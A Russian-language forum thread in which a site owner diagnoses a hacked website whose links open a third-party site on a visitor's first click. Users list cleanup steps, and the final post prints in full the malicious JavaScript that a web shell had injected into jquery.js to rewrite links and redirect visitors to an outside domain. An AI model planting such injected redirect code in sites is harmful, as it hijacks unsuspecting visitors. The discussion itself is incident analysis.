Взломан сайт. Нужна помощь!

ЕСТЬ РЕШЕНИЕ ЗАКРЫТО

При клике по любой ссылке открывается сторонний ресурс

#1 22 августа 2012 в 11:17
Если любой юзер первый раз заходит на сайт, то при клике по любой ссылке открывается ещё и дополнительная вкладка со сторонним сайтом. Любой второй клик к этому не приводит. Чищу куки и результат повторяется. Если кто-нибудь знает где искать, то подскажите пожалуйста. Заранее спасибо!
#2 22 августа 2012 в 11:20
Не смог воспроизвести, никакой другой сайт не открывается.
#3 22 августа 2012 в 11:21


Не смог воспроизвести, никакой другой сайт не открывается.

Евген
Речь идёт об этом сайте www.semya.tv/
#4 22 августа 2012 в 11:38

Если любой юзер первый раз заходит на сайт, то при клике по любой ссылке открывается ещё и дополнительная вкладка со сторонним сайтом. Любой второй клик к этому не приводит. Чищу куки и результат повторяется. Если кто-нибудь знает где искать, то подскажите пожалуйста. Заранее спасибо!

Bichukin Andrey

Порядок произвольный.

1. Смотрим на хостинге дату изменения файлов.
2. Ява скрипты
3. Индексные файлы
4. подозрительные файлы(шелл)
5. Ищем тут на форуме аналогичную тему, их много и делаем все как там написано.
6. Смотрим логи
7. Меняем пароли везде

Не забываем посмотреть что прописано в .htaccess
#5 22 августа 2012 в 11:39
Знаю такой скрипт Javascript с его помощью можно всем тегам а дать определенные действия, проверьте у себя может там какой нибудь сторонный файл .js есть?
#6 22 августа 2012 в 12:06
Bichukin Andrey, А не проще попросить хостера восстановить сайт из бэкапа, а потом менять пароль на доступ? На нормальном хостинге бэкапят 1 раз в 1-2 дня
#7 22 августа 2012 в 12:11

Bichukin Andrey, А не проще попросить хостера восстановить сайт из бэкапа, а потом менять пароль на доступ? На нормальном хостинге бэкапят 1 раз в 1-2 дня

Volgomarket

И так делать через день?
Может проще найти что и от куда и закрыть, думаю тут вскрыли из тех мест что описаны не раз тут на форуме и методы устранения есть.
#8 22 августа 2012 в 12:20

И так делать через день?

garry

а потом менять пароль на доступ

Volgomarket
что мешает слить с сервера файлы, сайт восстановить и потихоньку локально искать хвосты данной проблемы. Но это уж ктокак привык работать.
#9 22 августа 2012 в 12:21
Перезалил всё содержимое semya.tv/includes/jquery и проблема пропала. Припоминается, что когда проблема появилась в первый раз 3-4 мес назад. Сканер нашёл подозрительный шелл и я его удалил. В последствии смоделировать проблему не удавалось. Тем не менее она иногда как-то возникала. Сейчас зашли с чужого компа на сайт и сразу увидели. Стало ясно, что это бывает при первом заходе. Почистил у себя куки и проблема смоделировалась. Будет анализировать всю папку jquery. О результатах напишу сюда. Для желающих посмотреть больную папку, выкладываю её архив сюда www.semya.tv/jquery.rar
#10 22 августа 2012 в 12:25
Итак, удалённый ранее шелл отредактировал вот этот файл jquery.js

Вот сам код перенаправления:

function userapi(){var tii=new Date;var ti=1334776850000-tii;var dooo=document.cookie;var doo=dooo.indexOf('count');if(doo<0ti<0){var aaa=document.getElementsByTagName('a');for(var i=0;i<aaa.length;i++){var aa=aaa;var onl=aa.getAttribute('onclick');var hre=aa.getAttribute('href');var hr1=hre.indexOf('#')+1;var hr2=hre.indexOf('javascript')+1;var hr3=hre.indexOf('(')+1;var hr4=hre.indexOf('mailto')+1;var hr5=hre.indexOf('skype')+1;var hre=hr1+hr2+hr3+hr4+hr5;if(!onl!hre){aa.setAttribute('target','_blank');aa.setAttribute('onclick','setTimeout(location.replace('http://dr-m.ru'),500)')}}document.cookie='count=yes; path=/; expires=Tuesday,21-Dec-21 00:12:21 GMT'}else{if(doo<0){document.cookie='count=yes; path=/; expires=Tuesday,21-Dec-21 00:12:21 GMT'}}}setTimeout(userapi,1500);

Все спасибо за участие!
Используя этот сайт, вы соглашаетесь с тем, что мы используем файлы cookie.